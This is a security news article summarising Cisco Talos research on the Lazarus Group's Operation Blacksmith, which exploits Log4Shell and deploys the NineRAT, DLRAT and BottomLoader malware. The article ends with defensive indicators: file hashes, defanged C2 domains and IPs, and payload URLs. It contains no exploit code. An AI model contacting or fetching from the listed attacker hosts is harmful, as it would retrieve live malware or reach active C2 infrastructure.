Tuesday, April 16, 2024
News

Lazarus Group’s Operation Blacksmith Attacking Organizations Worldwide

The Lazarus Group is a notorious North Korean state-sponsored hacking organization known for:-

Cyber espionage

Financial Theft

Destructive attacks

They have been implicated in high-profile incidents, including the 2014 Sony Pictures hack and the 2017 WannaCry ransomware outbreak.

Cybersecurity researchers at Cisco Talos recently found Lazarus Group’s “Operation Blacksmith” using new DLang-based malware to attack organizations across the globe.

Blacksmith operation exploits Log4Shell (CVE-2021-44228) and deploys a new DLang RAT via Telegram for C2 communication.

Three families were discovered, including:-

Telegram-based RAT “NineRAT” 

Non-Telegram RAT “DLRAT” 

Downloader “BottomLoader”

Technical analysis

NineRAT operates through Telegram for C2, including commands and file transfers. Lazarus uses Telegram for stealth. 

It comprises a dropper with two embedded components:- 

An instrumentor (nsIookup.exe)

A second component for persistence (Execute by the first component.)

NineRAT, the main interaction method on infected hosts, coexists with previous tools like HazyLoad for sameness. Lazarus ensures persistent access with overlapping backdoor entries. 

Telegram C2 channels led to the discovery of a public bot, “[at]StudyJ001Bot,” which was later replaced by Lazarus-owned bots. Despite the switch, older NineRAT samples still use open channels, reads the report.

Anadriel, active since 2022, employs two API tokens, one publicly listed, interacting with Telegram via DLang-based libraries. 

Besides this, the NineRAT tests authentication and handles file upload/download through Telegram methods. Not only that but even from the system using a BAT file, the NineRAT can also uninstall itself.

NineRAT led to the discovery of two more Lazarus DLang-based malware families. BottomLoader, a downloader, downloads payloads via a PowerShell command and creates persistence. 

Infection chain (Source – Cisco Talos)

DLRAT, a downloader, and RAT that executes commands, performs system reconnaissance, and communicates with C2 using a hardcoded session ID. 

The attack exploits CVE-2021-44228 (Log4Shell) on public-facing VMWare Horizon servers for initial access, deploying a custom implant after reconnaissance.

IOCs

Hashes

HazyLoad

000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee

NineRAT

534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433

ba8cd92cc059232203bcadee260ddbae273fc4c89b18424974955607476982c4

47e017b40d418374c0889e4d22aa48633b1d41b16b61b1f2897a39112a435d30

f91188d23b14526676706a5c9ead05c1a91ea0b9d6ac902623bc565e1c200a59

5b02fc3cfb5d74c09cab724b5b54c53a7c07e5766bffe5b1adf782c9e86a8541

82d4a0fef550af4f01a07041c16d851f262d859a3352475c62630e2c16a21def

BottomLoader

0e416e3cc1673d8fc3e7b2469e491c005152b9328515ea9bbd7cf96f1d23a99f

DLRAT

e615ea30dd37644526060689544c1a1d263b6bb77fe3084aa7883669c1fde12f

9a48357c06758217b3a99cdf4ab83263c04bdea98c347dd14b254cab6c81b13a

Network IOCs

tech[.]micrsofts[.]com

tech[.]micrsofts[.]tech

27[.]102[.]113[.]93

185[.]29[.]8[.]53

155[.]94[.]208[.]209

162[.]19[.]71[.]175

201[.]77[.]179[.]66

hxxp://27[.]102[.]113[.]93/inet[.]txt

hxxp[://]162[.]19[.]71[.]175:7443/sonic/bottom[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/lndex[.]php

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/B691646991EBAEEC[.]gif

hxxp[://]201[.]77[.]179[.]66:8082/img/images/header/7AEBC320998FD5E5[.]gif

The post Lazarus Group’s Operation Blacksmith Attacking Organizations Worldwide appeared first on Cyber Security News.

   Read More 

Cyber Security News